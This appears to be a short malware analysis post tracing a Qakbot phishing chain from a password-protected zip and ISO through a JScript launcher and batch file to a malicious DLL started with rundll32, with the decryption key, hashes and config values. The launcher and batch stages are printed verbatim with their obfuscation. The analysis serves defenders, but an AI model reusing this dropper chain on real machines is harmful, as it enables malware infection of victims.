Three days ago a friend of mine received a phishing e-mail with a link (https[:]//lynxus[.]com/usq/refeidpisnretse) containing a zip file protected by the password "U492".
Inside the zip there is an ISO called Learn#7435.iso containing a shortcut to the following malicious script:
// observablyCleaned
var undisruptedPuzzles = "rund DllRegis";
// ShellExecute
var bridgeheadsLibels = new ActiveXObject("shell.application").shellexecute("assaulting\\redressingLamentations.cmd", undisruptedPuzzles, "", "open", 0);
The script uses ActiveXObject in order to execute another script called redressingLamentations.cmd (in the ISO) by passing the arguments "rund" and "DllRegis".
Following the redressingLamentations.cmd script:
@echo off
set a=ll
set e=32
:: tankageLicentiously
%1%a%%e% assaulting\tiddler.dat,%2terServer
exit
It runs the command rundll32 assaulting\tiddler.dat,DllRegisterServer in order to start the malicious DLL.
After a bit of analysis, I wrote this simple script to extract the loader in order to practice a bit with python. The two strings used to generate the key are taken dynamically, the shellcode is taken dynamically by using the size offset that is hardcoded.
The malicious DLL was uploaded to Malware Bazaar by JAMESWT_MHT.
These two strings are used to generate the key:
- ewZOSoNXdJTjGtfGFtJwDGnslgItKrqSOoXTBEUIeNsATwlqubQMeKZByuBEOxjyadypZOaxQyRosZjVcChW
- gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl
The key is:
- 7fafab656017bf33b9606982e6a6f277
HASHES:
-
SHA256: 5B54F57DBAA74FA589AFB2D26D6C6B39E0C2930BD88FEA3172556CE96B3EB959
-
SHA1: 4aa4e28cd07e218e45ec60942c53d82c3f50fea7
-
MD5: 7754a35deec807d757f79165ba17708d
Extracted DLL from tiddler.da, you can find it on Malware Bazaar.
Qakbot config
10=BB
3=1664535088
HASHES:
-
SHA256: 8b08c031d365a0b4d032c6e51bf773655e15795fe3eabcd3fa6487ffe9f3d6b3
-
SHA1: cd0528db38e743c619341d3a542748be86d9ba72
-
MD5: b8fb226a54197955a05705be00ff2d07